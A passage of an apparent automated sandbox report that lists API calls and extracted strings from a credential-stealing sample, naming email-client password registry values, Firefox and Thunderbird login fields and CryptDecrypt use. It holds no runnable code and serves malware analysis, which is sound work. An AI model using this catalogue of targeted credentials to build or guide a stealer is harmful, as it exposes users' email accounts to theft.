                                                                                                                                                                                          • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040ABFF,00000000), ref: 00406ACA
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FreeLibrary.KERNELBASE(?,00403C1D), ref: 00410172
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • EnumResourceNamesA.KERNEL32(?,?,Function_000105DD,00000000), ref: 00410672
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: EnumNamesResource
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3334572018-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindClose.KERNELBASE(?,00407C39,?,?,00000000,.8D,0044373A,*.oeaccount,.8D,?,00000104), ref: 00407D29
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseFind
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1863332320-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Open
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 71445658-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetFileAttributesA.KERNELBASE(?,00401EDD,?), ref: 00406D23
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A6B,?,00404981,?,?,00000000,?,00000000,?), ref: 004047D5
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047E9
                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045175C,CryptReleaseContext), ref: 004047F5
                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045175C,CryptCreateHash), ref: 00404801
                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045175C,CryptGetHashParam), ref: 0040480D
                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045175C,CryptHashData), ref: 00404819
                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045175C,CryptDestroyHash), ref: 00404825
                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045175C,CryptDecrypt), ref: 00404831
                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045175C,CryptDeriveKey), ref: 0040483D
                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045175C,CryptImportKey), ref: 00404849
                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045175C,CryptDestroyKey), ref: 00404855
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                          • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                                                                                                                          • API String ID: 2238633743-192783356
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                                                            • Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C69,?,?,?,?,00401C69,?,?,?), ref: 0041046D
                                                                                                                                                                                            • Part of subcall function 0041042B: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402928,?,?,?,?,00402928,?,?), ref: 0041044A
                                                                                                                                                                                            • Part of subcall function 00410475: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040264A,?), ref: 0041048B
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00402EBC
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00402ECF
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00402F5C
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00402F69
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402FC3
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _mbscpy$QueryValue$CloseOpen
                                                                                                                                                                                          • String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
                                                                                                                                                                                          • API String ID: 52435246-1534328989
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 00406BA4
                                                                                                                                                                                            • Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1
                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00406BC1
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00406BD2
                                                                                                                                                                                          • GlobalFix.KERNEL32(00000000), ref: 00406BDF
                                                                                                                                                                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BF2
                                                                                                                                                                                          • GlobalUnWire.KERNEL32(00000000), ref: 00406C01
                                                                                                                                                                                          • SetClipboardData.USER32(00000001,00000000), ref: 00406C0A
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00406C12
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00406C1E
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00406C29
                                                                                                                                                                                          • CloseClipboard.USER32 ref: 00406C32
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2565263379-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 00406C45
                                                                                                                                                                                          • strlen.MSVCRT ref: 00406C52
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040C0BB,?), ref: 00406C61
                                                                                                                                                                                          • GlobalFix.KERNEL32(00000000), ref: 00406C6E
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00406C77
                                                                                                                                                                                          • GlobalUnWire.KERNEL32(00000000), ref: 00406C80
                                                                                                                                                                                          • SetClipboardData.USER32(00000001,00000000), ref: 00406C89
                                                                                                                                                                                          • CloseClipboard.USER32 ref: 00406C99
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpystrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2315226746-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                                                                                                          • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                                                                                                          • API String ID: 3963849919-1658304561
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                          • String ID: E$ E$ E
                                                                                                                                                                                          • API String ID: 1865533344-1090515111
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • strlen.MSVCRT ref: 0044269A
                                                                                                                                                                                          • _strncoll.MSVCRT ref: 004426AA
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00442726
                                                                                                                                                                                          • atoi.MSVCRT ref: 00442737
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00442763
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharMultiWide_strncollatoimemcpystrlen
                                                                                                                                                                                          • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                                                                                                                                                          • API String ID: 1864335961-3210201812
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: strcmp$_strcmpi$memcpystrlenstrtoul
                                                                                                                                                                                          • String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                                                                                                                                          • API String ID: 1714764973-479759155
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 0040E6BB
                                                                                                                                                                                            • Part of subcall function 0040690E: memset.MSVCRT ref: 00406930
                                                                                                                                                                                            • Part of subcall function 0040690E: strlen.MSVCRT ref: 0040693B
                                                                                                                                                                                            • Part of subcall function 0040690E: strlen.MSVCRT ref: 00406949
                                                                                                                                                                                          • memset.MSVCRT ref: 0040E70C
                                                                                                                                                                                          • memset.MSVCRT ref: 0040E728
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,%@,000000FF,?,00000104,?,?,?,?,?,?,0040EC25,?,00000000), ref: 0040E73F
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040EC25,?), ref: 0040E75E
                                                                                                                                                                                          • memset.MSVCRT ref: 0040E7C0
                                                                                                                                                                                          • memset.MSVCRT ref: 0040E7D5
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E83A
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E850
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E866
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E87C
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E892
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E8A8
                                                                                                                                                                                          • memset.MSVCRT ref: 0040E8C2
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                                                                                                                                                          • String ID: $"$$$$$%@$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _strcmpi$strlen$_strncoll$atoimemset$memcpy
                                                                                                                                                                                          • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$port$server$signon.signonfilename$true$type$useSecAuth$useremail$username
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040690E: memset.MSVCRT ref: 00406930
                                                                                                                                                                                            • Part of subcall function 0040690E: strlen.MSVCRT ref: 0040693B
                                                                                                                                                                                            • Part of subcall function 0040690E: strlen.MSVCRT ref: 00406949
                                                                                                                                                                                            • Part of subcall function 004086A5: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,0040EC43,?,00000000,?,?,?,?,?,?), ref: 004086C3
                                                                                                                                                                                            • Part of subcall function 004086A5: CloseHandle.KERNEL32(?,?), ref: 0040870D
                                                                                                                                                                                            • Part of subcall function 00408763: _mbsicmp.MSVCRT ref: 0040879D
                                                                                                                                                                                          • memset.MSVCRT ref: 0040E123
                                                                                                                                                                                          • memset.MSVCRT ref: 0040E138
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E19F
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E1B5
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E1CB
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E1E1
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E1F7
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040E20A
                                                                                                                                                                                          • memset.MSVCRT ref: 0040E225
                                                                                                                                                                                          • memset.MSVCRT ref: 0040E23C
                                                                                                                                                                                            • Part of subcall function 00406582: memset.MSVCRT ref: 004065A3
                                                                                                                                                                                            • Part of subcall function 00406582: memcmp.MSVCRT ref: 004065CD
                                                                                                                                                                                          • memset.MSVCRT ref: 0040E29D
                                                                                                                                                                                          • memset.MSVCRT ref: 0040E2B4
                                                                                                                                                                                          • memset.MSVCRT ref: 0040E2CB
                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040E2E6
                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040E2FB
                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040E310
                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 0040E326
                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 0040E33F
                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 0040E358
                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 0040E374
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                                                                                                          • String ID: C@$encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 0040FDA3
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0040FDAF
                                                                                                                                                                                          • GetWindowLongA.USER32(00000000,000000F0), ref: 0040FDBE
                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 0040FDCA
                                                                                                                                                                                          • GetWindowLongA.USER32(00000000,000000EC), ref: 0040FDD3
                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000EC), ref: 0040FDDF
                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 0040FDF1
                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0040FDFC
                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040FE10
                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040FE1E
                                                                                                                                                                                          • GetDC.USER32 ref: 0040FE57
                                                                                                                                                                                          • strlen.MSVCRT ref: 0040FE97
                                                                                                                                                                                          • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 0040FEA8
                                                                                                                                                                                          • ReleaseDC.USER32(?,?), ref: 0040FEF5
                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040FFB5
                                                                                                                                                                                          • SetWindowTextA.USER32(?,?), ref: 0040FFC9
                                                                                                                                                                                          • SetWindowTextA.USER32(?,00000000), ref: 0040FFE7
                                                                                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 0041001D
                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 0041002D
                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041003B
                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 00410052
                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0041005C
                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 004100A2
                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004100AC
                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 004100E4
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                                                                                                          • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 004024E7
                                                                                                                                                                                            • Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C69,?,?,?,?,00401C69,?,?,?), ref: 0041046D
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00402525
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004025EF
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _mbscpy$QueryValuememset
                                                                                                                                                                                          • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 0040285B
                                                                                                                                                                                            • Part of subcall function 00402994: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029C5
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00402895
                                                                                                                                                                                            • Part of subcall function 00402994: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004029F3
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040296D
                                                                                                                                                                                            • Part of subcall function 0041042B: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402928,?,?,?,?,00402928,?,?), ref: 0041044A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                                                                                                                          • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                                                                                                                          • API String ID: 1497257669-167382505
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • EndDialog.USER32(?,?), ref: 0040F600
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 0040F618
                                                                                                                                                                                          • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040F637
                                                                                                                                                                                          • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040F644
                                                                                                                                                                                          • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040F64D
                                                                                                                                                                                          • memset.MSVCRT ref: 0040F675
                                                                                                                                                                                          • memset.MSVCRT ref: 0040F695
                                                                                                                                                                                          • memset.MSVCRT ref: 0040F6B3
                                                                                                                                                                                          • memset.MSVCRT ref: 0040F6CC
                                                                                                                                                                                          • memset.MSVCRT ref: 0040F6EA
                                                                                                                                                                                          • memset.MSVCRT ref: 0040F703
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 0040F70B
                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040F730
                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040F766
                                                                                                                                                                                          • memset.MSVCRT ref: 0040F7BD
                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 0040F7CB
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040F7FA
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040F81C
                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040F887
                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040F8A0
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 0040F8AA
                                                                                                                                                                                          • SetFocus.USER32(00000000), ref: 0040F8B1
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • {Unknown}, xrefs: 0040F67A
